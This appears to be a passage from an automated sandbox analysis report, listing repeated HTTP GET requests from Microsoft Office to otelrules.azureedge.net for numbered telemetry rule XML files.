              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
